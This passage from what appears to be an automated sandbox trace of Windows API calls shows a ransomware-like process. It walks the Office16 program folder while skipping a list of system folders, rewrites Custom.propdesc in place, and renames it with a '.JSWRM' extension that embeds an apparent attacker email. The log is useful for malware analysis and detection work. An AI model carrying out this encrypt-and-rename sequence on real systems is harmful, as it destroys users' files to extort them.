dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="TRANSMGR.DLL", cAlternateFileName="")) returned 1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2=".") returned 1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="..") returned 1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="...") returned 1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="windows") returned -1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="recovery") returned 1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="perflogs") returned 1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="documents and settings") returned 1 [0129.626] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.627] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="system volume information") returned 1 [0129.627] lstrcmpiW (lpString1="TRANSMGR.DLL", lpString2="msocache") returned 1 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMGR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMGR.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TRANSMGR.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMGR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMGR.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TRANSMGR.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.627] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x632fb8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x632fb8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="TRANSMGR.DLL", cAlternateFileName="")) returned 0 [0129.627] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0129.627] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bd0a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="cpprest140_2_6.dll", cAlternateFileName="CPPRES~1.DLL")) returned 1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2=".") returned 1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="..") returned 1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="...") returned 1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="windows") returned -1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="recovery") returned -1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="perflogs") returned -1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="documents and settings") returned -1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="system volume information") returned -1 [0129.627] lstrcmpiW (lpString1="cpprest140_2_6.dll", lpString2="msocache") returned -1 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cpprest140_2_6.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cpprest140_2_6.dll", cchWideChar=18, lpMultiByteStr=0x241038, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cpprest140_2_6.dll", lpUsedDefaultChar=0x0) returned 18 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cpprest140_2_6.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0129.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cpprest140_2_6.dll", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cpprest140_2_6.dll", lpUsedDefaultChar=0x0) returned 18 [0129.627] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17d4481d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f8c60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="csi.dll", cAlternateFileName="")) returned 1 [0129.627] lstrcmpiW (lpString1="csi.dll", lpString2=".") returned 1 [0129.627] lstrcmpiW (lpString1="csi.dll", lpString2="..") returned 1 [0129.627] lstrcmpiW (lpString1="csi.dll", lpString2="...") returned 1 [0129.628] lstrcmpiW (lpString1="csi.dll", lpString2="windows") returned -1 [0129.628] lstrcmpiW (lpString1="csi.dll", lpString2="recovery") returned -1 [0129.628] lstrcmpiW (lpString1="csi.dll", lpString2="perflogs") returned -1 [0129.628] lstrcmpiW (lpString1="csi.dll", lpString2="documents and settings") returned -1 [0129.628] lstrcmpiW (lpString1="csi.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.628] lstrcmpiW (lpString1="csi.dll", lpString2="system volume information") returned -1 [0129.628] lstrcmpiW (lpString1="csi.dll", lpString2="msocache") returned -1 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csi.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csi.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csi.dll", lpUsedDefaultChar=0x0) returned 7 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csi.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csi.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csi.dll", lpUsedDefaultChar=0x0) returned 7 [0129.628] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf2dd35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4e270, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CSIRESOURCES.DLL", cAlternateFileName="CSIRES~1.DLL")) returned 1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2=".") returned 1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="..") returned 1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="...") returned 1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="windows") returned -1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="recovery") returned -1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="perflogs") returned -1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="documents and settings") returned -1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="system volume information") returned -1 [0129.628] lstrcmpiW (lpString1="CSIRESOURCES.DLL", lpString2="msocache") returned -1 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSIRESOURCES.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSIRESOURCES.DLL", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSIRESOURCES.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSIRESOURCES.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSIRESOURCES.DLL", cchWideChar=16, lpMultiByteStr=0x2411f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSIRESOURCES.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.628] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4cab791, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4cab791, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd8a5d714, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x904f8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CSS7DATA0009.DLL", cAlternateFileName="CSS7DA~1.DLL")) returned 1 [0129.628] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2=".") returned 1 [0129.628] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="..") returned 1 [0129.628] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="...") returned 1 [0129.628] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="windows") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="recovery") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="perflogs") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="documents and settings") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="system volume information") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA0009.DLL", lpString2="msocache") returned -1 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA0009.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA0009.DLL", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSS7DATA0009.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA0009.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA0009.DLL", cchWideChar=16, lpMultiByteStr=0x241128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSS7DATA0009.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.629] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4cd1a25, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4cd1a25, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd8a5d714, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbacf8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CSS7DATA000A.DLL", cAlternateFileName="CSS7DA~3.DLL")) returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2=".") returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="..") returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="...") returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="windows") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="recovery") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="perflogs") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="documents and settings") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="system volume information") returned -1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000A.DLL", lpString2="msocache") returned -1 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000A.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000A.DLL", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSS7DATA000A.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000A.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000A.DLL", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSS7DATA000A.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.629] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4cab791, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4cab791, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd8a8396f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xba890, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CSS7DATA000C.DLL", cAlternateFileName="CSS7DA~2.DLL")) returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2=".") returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="..") returned 1 [0129.629] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="...") returned 1 [0129.630] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="windows") returned -1 [0129.630] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="recovery") returned -1 [0129.630] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="perflogs") returned -1 [0129.630] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="documents and settings") returned -1 [0129.630] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.630] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="system volume information") returned -1 [0129.630] lstrcmpiW (lpString1="CSS7DATA000C.DLL", lpString2="msocache") returned -1 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000C.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000C.DLL", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSS7DATA000C.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000C.DLL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CSS7DATA000C.DLL", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CSS7DATA000C.DLL", lpUsedDefaultChar=0x0) returned 16 [0129.630] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17d1e5ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x53f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Custom.propdesc", cAlternateFileName="CUSTOM~1.PRO")) returned 1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2=".") returned 1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="..") returned 1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="...") returned 1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="windows") returned -1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="recovery") returned -1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="perflogs") returned -1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="documents and settings") returned -1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="$RECYCLE.BIN") returned 1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="system volume information") returned -1 [0129.630] lstrcmpiW (lpString1="Custom.propdesc", lpString2="msocache") returned -1 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Custom.propdesc", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Custom.propdesc", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Custom.propdesc", lpUsedDefaultChar=0x0) returned 15 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Custom.propdesc", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Custom.propdesc", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Custom.propdesc", lpUsedDefaultChar=0x0) returned 15 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Custom.propdesc" (normalized: "c:\\program files\\microsoft office\\root\\office16\\custom.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.632] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1343) returned 1 [0129.632] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.632] ReadFile (in: hFile=0x45c, lpBuffer=0x21af28, nNumberOfBytesToRead=0x530, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesRead=0x345ec04*=0x530, lpOverlapped=0x0) returned 1 [0129.634] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.634] WriteFile (in: hFile=0x45c, lpBuffer=0x21af28*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesWritten=0x345ec00*=0x530, lpOverlapped=0x0) returned 1 [0129.634] CloseHandle (hObject=0x45c) returned 1 [0129.634] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Custom.propdesc" (normalized: "c:\\program files\\microsoft office\\root\\office16\\custom.propdesc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Custom.propdesc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\custom.propdesc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.635] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4d40834, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x85cb0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="DATAGATH.DLL", cAlternateFileName="")) returned 1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2=".") returned 1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="..") returned 1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="...") returned 1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="windows") returned -1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="recovery") returned -1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="perflogs") returned -1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="documents and settings") returned -1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="system volume information") returned -1 [0129.635] lstrcmpiW (lpString1="DATAGATH.DLL", lpString2="msocache") returned -1 [0129.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATAGATH.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATAGATH.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATAGATH.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATAGATH.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATAGATH.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATAGATH.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.635] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdd0b2f3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde2222ea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1702b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0129.635] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2=".") returned 1 [0129.635] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="..") returned 1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", 